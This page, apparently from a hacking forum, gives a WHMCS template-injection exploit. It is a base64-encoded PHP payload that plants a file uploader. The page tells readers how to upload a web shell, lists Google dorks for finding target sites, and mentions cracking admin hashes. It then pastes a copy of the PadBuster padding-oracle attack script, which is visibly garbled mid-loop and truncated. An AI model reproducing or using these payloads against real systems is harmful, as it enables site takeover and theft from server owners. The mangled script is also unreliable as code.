{php}eval(base64_decode('JGM9YmFzZTY0X2RlY29kZSgiUEQ5d2FIQU5DbWxtS0dsemMyVjBLQ1JmVUU5VFZGc25VM1ZpYldsMEoxMHBLWHNOQ2lBZ0lDQWtabWxzWldScGNpQTlJQ0lpT3lBTkNpQWdJQ0FrYldGNFptbHNaU0E5SUNjeU1EQXdNREF3SnpzTkNnMEtJQ0FnSUNSMWMyVnlabWxzWlY5dVlXMWxJRDBnSkY5R1NVeEZVMXNuYVcxaFoyVW5YVnNuYm1GdFpTZGRPdzBLSUNBZ0lDUjFjMlZ5Wm1sc1pWOTBiWEFnUFNBa1gwWkpURVZUV3lkcGJXRm5aU2RkV3lkMGJYQmZibUZ0WlNkZE93MEtJQ0FnSUdsbUlDaHBjM05sZENna1gwWkpURVZUV3lkcGJXRm5aU2RkV3lkdVlXMWxKMTBwS1NCN0RRb2dJQ0FnSUNBZ0lDUmhZbTlrSUQwZ0pHWnBiR1ZrYVhJdUpIVnpaWEptYVd4bFgyNWhiV1U3RFFvZ0lDQWdJQ0FnSUVCdGIzWmxYM1Z3Ykc5aFpHVmtYMlpwYkdVb0pIVnpaWEptYVd4bFgzUnRjQ3dnSkdGaWIyUXBPdzBLSUNBTkNtVmphRzhpUEdObGJuUmxjajQ4WWo1RWIyNWxJRDA5UGlBa2RYTmxjbVpwYkdWZmJtRnRaVHd2WWo0OEwyTmxiblJsY2o0aU93MEtmUTBLZlEwS1pXeHpaWHNOQ21WamFHOG5EUW84Wm05eWJTQnRaWFJvYjJROUlsQlBVMVFpSUdGamRHbHZiajBpSWlCbGJtTjBlWEJsUFNKdGRXeDBhWEJoY25RdlptOXliUzFrWVhSaElqNDhhVzV3ZFhRZ2RIbHdaVDBpWm1sc1pTSWdibUZ0WlQwaWFXMWhaMlVpUGp4cGJuQjFkQ0IwZVhCbFBTSlRkV0p0YVhRaUlHNWhiV1U5SWxOMVltMXBkQ0lnZG1Gc2RXVTlJbE4xWW0xcGRDSStQQzltYjNKdFBpYzdEUXA5RFFvL1BpQT0iKTsNCiRmaWNoaWVyID0gZm9wZW4oJ2Rvd25sb2Fkcy9pbmRleHgucGhwJywndycpOw0KZndyaXRlKCRmaWNoaWVyLCAkYyk7DQpmY2xvc2UoJGZpY2hpZXIpOw=='));exit;{/php}______________________________________________________________________________

fill the captcha click enter,nowfirst of all , have a look on the submit ticket urlfor examplehttp://www.website.com/client/submitticket.phpso to get the uploader replace the submitticket.php with downloads/indexx.phpremember its indexx.php,when code will execute , it will create indexx.php and its uploadersoopen the urlhttp://www.website.com/client/downloads/indexx.phpyou will seefile upload option !

browse the shell and click upload after uploading shellopn the urlhttp://www.website.com/client/downloads/shell_name.phphell yeahowned :D

WHMCS Auto Exploiter Take WHMCS auto exploiter php script. Upload it to some php server.

In Google Dork make your own dork and click exploit like :

Dorks :

inurl:submitticket.php site:.cominurl:submitticket.php site:.netinurl:submitticket.php site:.usinurl:submitticket.php site:.euinurl:submitticket.php site:.orginurl:submitticket.php site:.ukintext:Powered by WHMCompleteSolutionintext:Powered by WHMCompleteSolution inurl:clientarea.phpinurl:announcements.php intext:WHMCompleteSolutionintext:Powered by WHMCS

Crack hash. Go to site and open admin panel and make successful login.

Oracle Padding Attack Using Brup Suite

Requiements :

Microsoft SQl Server 2008 R2 Brup Suit Professional v1.4.07 exe.bat [ Save it in notepad and rename as exe.bat ]

@echo offcmd

padBuster.pl [ Save it in notepad and rename as padBuster.pl ]#!/usr/bin/perl## PadBuster v0.3.3 - Automated script for performing Padding Oracle attacks# Brian Holyfield - Gotham Digital Science (labs@gdssecurity.com)## Credits to J.Rizzo and T.Duong for providing proof of concept web exploit# techniques and S.Vaudenay for initial discovery of the attack. Credits also# to James M. Martin (research@esptl.com) for sharing proof of concept exploit# code for performing various brute force attack techniques, and wireghoul (Eldar # Marcussen) for making code quality improvements. #

use LWP::UserAgent;use strict;use warnings;use Getopt::Std;use MIME::Base64;use URI::Escape;use Getopt::Long;use Time::HiRes qw( gettimeofday );use Compress::Zlib;use Crypt::SSLeay;

# Set defaults with $variable = valuemy $logFiles;my $post;my $encoding = 0;my $headers;my $cookie;my $error;my $prefix;my $intermediaryInput;my $cipherInput;my $plainTextInput;my $encodedPlainTextInput;my $noEncodeOption;my $superVerbose;my $proxy;my $proxyAuth;my $noIv;my $auth;my $resumeBlock;my $interactive = 0;my $bruteForce;my $ignoreContent;my $useBody;my $verbose;

GetOptions( "log" => \$logFiles, "post=s" => \$post, "encoding=s" => \$encoding, "headers=s" => \$headers, "cookies=s" => \$cookie, "error=s" => \$error, "prefix=s" => \$prefix, "intermediate=s" => \$intermediaryInput, "ciphertext=s" => \$cipherInput, "plaintext=s" => \$plainTextInput, "encodedtext=s" => \$encodedPlainTextInput, "noencode" => \$noEncodeOption, "veryverbose" => \$superVerbose, "proxy=s" => \$proxy, "proxyauth=s" => \$proxyAuth, "noiv" => \$noIv, "auth=s" => \$auth, "resume=s" => \$resumeBlock, "interactive" => \$interactive, "bruteforce" => \$bruteForce, "ignorecontent" => \$ignoreContent, "usebody" => \$useBody, "verbose" => \$verbose); print "\n+-------------------------------------------+\n";print "| PadBuster - v0.3.3 |\n";print "| Brian Holyfield - Gotham Digital Science |\n";print "| labs\@gdssecurity.com |\n";print "+-------------------------------------------+\n";

if ($#ARGV < 2) { die " Use: padBuster.pl URL EncryptedSample BlockSize [options]

Where: URL = The target URL (and query string if applicable) EncryptedSample = The encrypted value you want to test. Must also be present in the URL, PostData or a Cookie BlockSize = The block size being used by the algorithm

Options: -auth [username:password]: HTTP Basic Authentication -bruteforce: Perform brute force against the first block -ciphertext [Bytes]: CipherText for Intermediate Bytes (Hex-Encoded) -cookies [HTTP Cookies]: Cookies (name1=value1; name2=value2) -encoding [0-4]: Encoding Format of Sample (Default 0) 0=Base64, 1=Lower HEX, 2=Upper HEX 3=.NET UrlToken, 4=WebSafe Base64 -encodedtext [Encoded String]: Data to Encrypt (Encoded) -error [Error String]: Padding Error Message -headers [HTTP Headers]: Custom Headers (name1::value1;name2::value2) -interactive: Prompt for confirmation on decrypted bytes -intermediate [Bytes]: Intermediate Bytes for CipherText (Hex-Encoded) -log: Generate log files (creates folder PadBuster.DDMMYY) -noencode: Do not URL-encode the payload (encoded by default) -noiv: Sample does not include IV (decrypt first block) -plaintext [String]: Plain-Text to Encrypt -post [Post Data]: HTTP Post Data String -prefix [Prefix]: Prefix bytes to append to each sample (Encoded) -proxy [address:port]: Use HTTP/S Proxy -proxyauth [username:password]: Proxy Authentication -resume [Block Number]: Resume at this block number -usebody: Use response body content for response analysis phase -verbose: Be Verbose -veryverbose: Be Very Verbose (Debug Only) ";}

# Ok, if we've made it this far we are ready to begin..my $url = $ARGV[0];my $sample = $ARGV[1];my $blockSize = $ARGV[2];

if ($url eq "" || $sample eq "" || $blockSize eq "") {print "\nERROR: The URL, EncryptedSample and BlockSize cannot be null.\n";exit();}

# Hard Coded Inputs#$post = "";#$sample = "";

my $method = $post ? "POST" : "GET";

# These are file related variablesmy $dirName = "PadBuster." . &getTime("F");my $dirSlash = "/";my $dirCmd = "mkdir ";if (defined($ENV{'OS'})) { if ($ENV{OS} =~ /Windows/) { $dirSlash = "\\"; $dirCmd = "md "; }}my $dirExists = 0;my $printStats = 0;my $requestTracker = 0;my $timeTracker = 0; if ($encoding < 0 || $encoding > 4) {print "\nERROR: Encoding must be a value between 0 and 4\n";exit();} my $encodingFormat = $encoding ? $encoding : 0;

my $encryptedBytes = $sample;my $totalRequests = 0;

# See if the sample needs to be URL decoded, otherwise don't (the plus from B64 will be a problem)if ($sample =~ /\%/) {$encryptedBytes = &uri_unescape($encryptedBytes)}

# Prep the sample for regex use$sample = quotemeta $sample;

# Now decode$encryptedBytes = &myDecode($encryptedBytes, $encodingFormat);if ( (length($encryptedBytes) % $blockSize) > 0) {print "\nERROR: Encrypted Bytes must be evenly divisible by Block Size ($blockSize)\n";print " Encrypted sample length is ".int(length($encryptedBytes)).". Double check the Encoding and Block Size.\n";exit();}

# If no IV, then append nulls as the IV (only if decrypting)if ($noIv && !$bruteForce && !$plainTextInput) {$encryptedBytes = "\x00" x $blockSize . $encryptedBytes;}

# PlainTextBytes is where the complete decrypted sample will be stored (decrypt only)my $plainTextBytes;

# This is a bool to make sure we know where to replace the sample stringmy $wasSampleFound = 0;

# ForgedBytes is where the complete forged sample will be stored (encrypt only)my $forgedBytes;

# Isolate the IV into a separate byte arraymy $ivBytes = substr($encryptedBytes, 0, $blockSize);

# Declare some optional elements for storing the results of the first test iteration# to help the user if they don't know what the padding error looks likemy @oracleCantidates;my $oracleSignature = "";my %oracleGuesses;my %responseFileBuffer;

# The block count should be the sample divided by the blocksizemy $blockCount = int(length($encryptedBytes)) / int($blockSize);

if (!$bruteForce && !$plainTextInput && $blockCount < 2) {print "\nERROR: There is only one block. Try again using the -noiv option.\n";exit();}

# The attack works by sending in a real cipher text block along with a fake block in front of it# You only ever need to send two blocks at a time (one real one fake) and just work through# the sample one block at a time

# First, re-issue the original request to let the user know if something is potentially brokenmy ($status, $content, $location, $contentLength) = &makeRequest($method, $url, $post, $cookie);

&myPrint("\nINFO: The original request returned the following",0);&myPrint("[+] Status: $status",0);&myPrint("[+] Location: $location",0);&myPrint("[+] Content Length: $contentLength\n",0);&myPrint("[+] Response: $content\n",1);

$plainTextInput = &myDecode($encodedPlainTextInput,$encodingFormat) if $encodedPlainTextInput;

if ($bruteForce) {&myPrint("INFO: Starting PadBuster Brute Force Mode",0);my $bfAttempts = 0;print "INFO: Resuming previous brute force at attempt $resumeBlock\n" if $resumeBlock;# Only loop through the first 3 bytes...this should be enough as it # requires 16.5M+ requestsmy @bfSamples;my $sampleString = "\x00" x 2;for my $c (0 ... 255) { substr($sampleString, 0, 1, chr($c)); for my $d (0 ... 255) { substr($sampleString, 1, 1, chr($d)); push (@bfSamples, $sampleString); }}

foreach my $testVal (@bfSamples) { my $complete = 0; while ($complete == 0) { my $repeat = 0; for my $b (0 ... 255) { $bfAttempts++; if ( $resumeBlock && ($bfAttempts < ($resumeBlock - ($resumeBlock % 256)+1)) ) { #SKIP } else { my $testBytes = chr($b).$testVal; $testBytes .= "\x00" x ($blockSize-3);

my $combinedBf = $testBytes; $combinedBf .= $encryptedBytes; $combinedBf = &myEncode($combinedBf, $encoding);

# Add the Query String to the URL my ($testUrl, $testPost, $testCookies) = &prepRequest($url, $post, $cookie, $sample, $combinedBf);

# Issue the request my ($status, $content, $location, $contentLength) = &makeRequest($method, $testUrl, $testPost, $testCookies);

my $signatureData = "$status\t$contentLength\t$location"; $signatureData = "$status\t$contentLength\t$location\t$content" if $useBody;

if ($oracleSignature eq "") {&myPrint("[+] Starting response analysis...\n",0) if ($b ==0);$oracleGuesses{$signatureData}++;$responseFileBuffer{$signatureData} = "Status: $status\nLocation: $location\nContent-Length: $contentLength\nContent:\n$content";if ($b == 255) {&myPrint("*** Response Analysis Complete ***\n",0);&determineSignature();$printStats = 1;$timeTracker = 0;$requestTracker = 0;$repeat = 1;$bfAttempts = 0;} } if ($oracleSignature ne "" && $oracleSignature ne $signatureData) {&myPrint("\nAttempt $bfAttempts - Status: $status - Content Length: $contentLength\n$testUrl\n",0);&writeFile("Brute_Force_Attempt_".$bfAttempts.".txt", "URL: $testUrl\nPost Data: $testPost\nCookies: $testCookies\n\nStatus: $status\nLocation: $location\nContent-Length: $contentLength\nContent:\n$content"); } } } ($repeat == 1) ? ($complete = 0) : ($complete = 1); } } } elsif ($plainTextInput) {# ENCRYPT MODE&myPrint("INFO: Starting PadBuster Encrypt Mode",0);# The block count will be the plaintext divided by blocksize (rounded up)my $blockCount = int(((length($plainTextInput)+1)/$blockSize)+0.99);&myPrint("[+] Number of Blocks: ".$blockCount."\n",0);my $padCount = ($blockSize * $blockCount) - length($plainTextInput);$plainTextInput.= chr($padCount) x $padCount;# SampleBytes is the encrypted text you want to derive intermediate values for, so # copy the current ciphertext block into sampleBytes# Note, nulls are used if not provided and the intermediate values are brute forced$forgedBytes = $cipherInput ? &myDecode($cipherInput,1) : "\x00" x $blockSize;my $sampleBytes = $forgedBytes;for (my $blockNum = $blockCount; $blockNum > 0; $blockNum--) { # IntermediaryBytes is where the intermediate bytes produced by the algorithm are storedmy $intermediaryBytes;if ($intermediaryInput && $blockNum == $blockCount) {$intermediaryBytes = &myDecode($intermediaryInput,2);} else {$intermediaryBytes = &processBlock($sampleBytes);} # Now XOR the intermediate bytes with the corresponding bytes from the plain-text block # This will become the next ciphertext block (or IV if the last one) $sampleBytes = $intermediaryBytes ^ substr($plainTextInput, (($blockNum-1) * $blockSize), $blockSize);$forgedBytes = $sampleBytes.$forgedBytes;&myPrint("\nBlock ".($blockNum)." Results:",0);&myPrint("[+] New Cipher Text (HEX): ".&myEncode($sampleBytes,1),0);&myPrint("[+] Intermediate Bytes (HEX): ".&myEncode($intermediaryBytes,1)."\n",0);}$forgedBytes = &myEncode($forgedBytes, $encoding);chomp($forgedBytes);} else {# DECRYPT MODE&myPrint("INFO: Starting PadBuster Decrypt Mode",0);if ($resumeBlock) {&myPrint("INFO: Resuming previous exploit at Block $resumeBlock\n",0);} else {$resumeBlock = 1}# Assume that the IV is included in our sample and that the first block is the IVfor (my $blockNum = ($resumeBlock+1); $blockNum = 0; $byteNum--) {INNERLOOP:for (my $i = 255; $i >= 0; $i--) {# Fuzz the test bytesubstr($testBytes, $byteNum, 1, chr($i));

# Combine the test bytes and the samplemy $combinedTestBytes = $testBytes.$sampleBytes;

if ($prefix) {$combinedTestBytes = &myDecode($prefix,$encodingFormat).$combinedTestBytes }

$combinedTestBytes = &myEncode($combinedTestBytes, $encodingFormat);chomp($combinedTestBytes);

if (! $noEncodeOption) {$combinedTestBytes = &uri_escape($combinedTestBytes); }

my ($testUrl, $testPost, $testCookies) = &prepRequest($url, $post, $cookie, $sample, $combinedTestBytes);

# Ok, now make the request

my ($status, $content, $location, $contentLength) = &makeRequest($method, $testUrl, $testPost, $testCookies);

my $signatureData = "$status\t$contentLength\t$location";$signatureData = "$status\t$contentLength\t$location\t$content" if $useBody;# If this is the first block and there is no padding error message defined, then cycle through # all possible requests and let the user decide what the padding error behavior is.if ($analysisMode == 0) {&myPrint("INFO: No error string was provided...starting response analysis\n",0) if ($i == 255);$oracleGuesses{$signatureData}++;$responseFileBuffer{$signatureData} = "URL: $testUrl\nPost Data: $testPost\nCookies: $testCookies\n\nStatus: $status\nLocation: $location\nContent-Length: $contentLength\nContent:\n$content";if ($byteNum == $blockSize - 1 && $i == 0) {&myPrint("*** Response Analysis Complete ***\n",0);&determineSignature();$analysisMode = 1;$repeat = 1;last OUTERLOOP;}}

my $continue = "y";

if (($error && $content !~ /$error/) || ($oracleSignature ne "" && $oracleSignature ne $signatureData)) {# This is for autoretry logic (only works on the first byte)if ($autoRetry == 1 && ($byteNum == ($blockSize - 1) ) && $hasHit == 0 ) {$hasHit++;} else {# If there was no padding error, then it worked&myPrint("[+] Success: (".abs($i-256)."/256) [Byte ".($byteNum+1)."]",0);&myPrint("[+] Test Byte:".&uri_escape(substr($testBytes, $byteNum, 1)),1);# If continually getting a hit on attempt zero, then something is probably wrong$falsePositiveDetector++ if ($i == 255);

if ($interactive == 1) {$continue = &promptUser("Do you want to use this value (Yes/No/All)? [y/n/a]","",1);}

if ($continue eq "y" || $continue eq "a") {$interactive = 0 if ($continue eq "a");

# Next, calculate the decrypted byte by XORing it with the padding valuemy ($currentPaddingByte, $nextPaddingByte);

# These variables could allow for flexible padding schemes (for now PCKS)# For PCKS#7, the padding block is equal to chr($blockSize - $byteNum)$currentPaddingByte = chr($blockSize - $byteNum);$nextPaddingByte = chr($blockSize - $byteNum + 1);

my $decryptedByte = substr($testBytes, $byteNum, 1) ^ $currentPaddingByte;&myPrint("[+] XORing with Padding Char, which is ".&uri_escape($currentPaddingByte),1);

$returnValue = $decryptedByte.$returnValue;&myPrint("[+] Decrypted Byte is: ".&uri_escape($decryptedByte),1);

# Finally, update the test bytes in preparation for the next round, based on the padding used for (my $k = $byteNum; $k < $blockSize; $k++) {# First, XOR the current test byte with the padding value for this round to recover the decrypted bytesubstr($testBytes, $k, 1,(substr($testBytes, $k, 1) ^ $currentPaddingByte));

# Then, XOR it again with the padding byte for the next roundsubstr($testBytes, $k, 1,(substr($testBytes, $k, 1) ^ $nextPaddingByte));}last INNERLOOP; }

}}## TODO: Combine these two blocks?if ($i == 0 && $analysisMode == 1) {# End of the road with no success. We should probably try again.&myPrint("ERROR: No matching response on [Byte ".($byteNum+1)."]",0);

if ($autoRetry == 0) {$autoRetry = 1;&myPrint(" Automatically trying one more time...",0);$repeat = 1;last OUTERLOOP;} else {if (($byteNum == $blockSize - 1) && ($error)) {&myPrint("\nAre you sure you specified the correct error string?",0);&myPrint("Try re-running without the -e option to perform a response analysis.\n",0);}

$continue = &promptUser("Do you want to start this block over? (Yes/No)? [y/n/a]","",1);if ($continue ne "n") {&myPrint("INFO: Switching to interactive mode",0);$interactive = 1;$repeat = 1;last OUTERLOOP;}}} if ($falsePositiveDetector == $blockSize) {&myPrint("\n*** ERROR: It appears there are false positive results. ***\n",0);&myPrint("HINT: The most likely cause for this is an incorrect error string.\n",0);if ($error) {&myPrint("[+] Check the error string you provided and try again, or consider running",0);&myPrint("[+] without an error string to perform an automated response analysis.\n",0);} else {&myPrint("[+] You may want to consider defining a custom padding error string",0);&myPrint("[+] instead of the automated response analysis.\n",0);}$continue = &promptUser("Do you want to start this block over? (Yes/No)? [y/n/a]","",1);if ($continue eq "y") {&myPrint("INFO: Switching to interactive mode",0);$interactive = 1;$repeat = 1;last OUTERLOOP;}}} }($repeat == 1) ? ($complete = 0) : ($complete = 1);}return $returnValue;}

sub makeRequest { my ($method, $url, $data, $cookie) = @_; my ($noConnect, $lwp, $status, $content, $req, $location, $contentLength); my $numRetries = 0; $data ='' unless $data; $cookie='' unless $cookie;

$requestTracker++; do { #Quick hack to avoid hostname in URL when using a proxy with SSL (this will get re-set later if needed) $ENV{HTTPS_PROXY} = ""; $lwp = LWP::UserAgent->new(env_proxy => 1, keep_alive => 1, timeout => 30, requests_redirectable => [], ); $req = new HTTP::Request $method => $url;

&myPrint("Request:\n$method\n$url\n$data\n$cookie",0) if $superVerbose; # Add request content for POST and PUTS if ($data) { $req->content_type('application/x-www-form-urlencoded'); $req->content($data); } if ($proxy) { my $proxyUrl = "http://"; if ($proxyAuth) { my ($proxyUser, $proxyPass) = split(":",$proxyAuth); $ENV{HTTPS_PROXY_USERNAME}= $proxyUser;$ENV{HTTPS_PROXY_PASSWORD}= $proxyPass;$proxyUrl .= $proxyAuth."@"; } $proxyUrl .= $proxy; $lwp->proxy(['http'], "http://".$proxy);$ENV{HTTPS_PROXY} = "http://".$proxy; }

if ($auth) { my ($httpuser, $httppass) = split(/:/,$auth); $req->authorization_basic($httpuser, $httppass); }

# If cookies are defined, add a COOKIE header if (! $cookie eq "") { $req->header(Cookie => $cookie); } if ($headers) { my @customHeaders = split(/;/i,$headers); for (my $i = 0; $i header($headerName, $headerVal); } } my $startTime = &gettimeofday(); my $response = $lwp->request($req); my $endTime = &gettimeofday(); $timeTracker = $timeTracker + ($endTime - $startTime); if ($printStats == 1 && $requestTracker % 250 == 0) { print "[+] $requestTracker Requests Issued (Avg Request Time: ".(sprintf "%.3f", $timeTracker/100).")\n"; $timeTracker = 0; } # Extract the required attributes from the response $status = substr($response->status_line, 0, 3); $content = $response->content; &myPrint("Response Content:\n$content",0) if $superVerbose; $location = $response->header("Location"); if (!$location) { $location = "N/A"; } #$contentLength = $response->header("Content-Length"); $contentLength = length($content); my $contentEncoding = $response->header("Content-Encoding"); if ($contentEncoding) { if ($contentEncoding =~ /GZIP/i ) { $content = Compress::Zlib::memGunzip($content); $contentLength = length($content); } } my $statusMsg = $response->status_line; #myPrint("Status: $statusMsg, Location: $location, Length: $contentLength",1); if ($statusMsg =~ /Can't connect/) { print "ERROR: $statusMsg\n Retrying in 10 seconds...\n\n"; $noConnect = 1; $numRetries++; sleep 10; } else { $noConnect = 0; $totalRequests++; } } until (($noConnect == 0) || ($numRetries >= 15)); if ($numRetries >= 15) { &myPrint("ERROR: Number of retries has exceeded 15 attempts...quitting.\n",0); exit; } return ($status, $content, $location, $contentLength);} sub myPrint { my ($printData, $printLevel) = @_; $printData .= "\n"; if (($verbose && $printLevel > 0) || $printLevel < 1 || $superVerbose) { print $printData; &writeFile("ActivityLog.txt",$printData); }}

sub myEncode { my ($toEncode, $format) = @_; return &encodeDecode($toEncode, 0, $format);}

sub myDecode { my ($toDecode, $format) = @_; return &encodeDecode($toDecode, 1, $format);}

sub encodeDecode { my ($toEncodeDecode, $oper, $format) = @_; # Oper: 0=Encode, 1=Decode # Format: 0=Base64, 1 Hex Lower, 2 Hex Upper, 3=NetUrlToken my $returnVal = ""; if ($format == 1 || $format == 2) { # HEX if ($oper == 1) { #Decode #Always convert to lower when decoding) $toEncodeDecode = lc($toEncodeDecode);$returnVal = pack("H*",$toEncodeDecode); } else { #Encode$returnVal = unpack("H*",$toEncodeDecode);if ($format == 2) { #Uppercase$returnVal = uc($returnVal) } } } elsif ($format == 3) { # NetUrlToken if ($oper == 1) {$returnVal = &web64Decode($toEncodeDecode,1); } else {$returnVal = &web64Encode($toEncodeDecode,1); } } elsif ($format == 4) { # Web64 if ($oper == 1) { $returnVal = &web64Decode($toEncodeDecode,0); } else { $returnVal = &web64Encode($toEncodeDecode,0); } } else { # B64 if ($oper == 1) { $returnVal = &decode_base64($toEncodeDecode); } else { $returnVal = &encode_base64($toEncodeDecode); $returnVal =~ s/(\r|\n)//g; } } return $returnVal;}

sub web64Encode { my ($input, $net) = @_; # net: 0=No Padding Number, 1=Padding (NetUrlToken) $input = &encode_base64($input); $input =~ s/(\r|\n)//g; $input =~ s/\+/\-/g; $input =~ s/\//\_/g; my $count = $input =~ s/\=//g; $count = 0 if ($count eq ""); $input.=$count if ($net == 1); return $input;}

sub web64Decode { my ($input, $net) = @_; # net: 0=No Padding Number, 1=Padding (NetUrlToken) $input =~ s/\-/\+/g; $input =~ s/\_/\//g; if ($net == 1) { my $count = chop($input); $input = $input.("=" x int($count)); } return &decode_base64($input);}

sub promptUser { my($prompt, $default, $yn) = @_; my $defaultValue = $default ? "[$default]" : ""; print "$prompt $defaultValue: "; chomp(my $input = ); $input = $input ? $input : $default; if ($yn) { if ($input =~ /^y|n|a$/) { return $input; } else { &promptUser($prompt, $default, $yn); } } else { if ($input =~ /^-?\d/ && $input > 0 && $input < 256) { return $input; } else { &promptUser($prompt, $default); } }}

sub writeFile { my ($fileName, $fileContent) = @_; if ($logFiles) { if ($dirExists != 1) { system($dirCmd." ".$dirName); $dirExists = 1; } $fileName = $dirName.$dirSlash.$fileName; open(my $OUTFILE, '>>', $fileName) or die "ERROR: Can't write to file $fileName\n"; print $OUTFILE $fileContent; close($OUTFILE); }}

sub getTime { my ($format) = @_; my ($second, $minute, $hour, $day, $month, $year, $weekday, $dayofyear, $isDS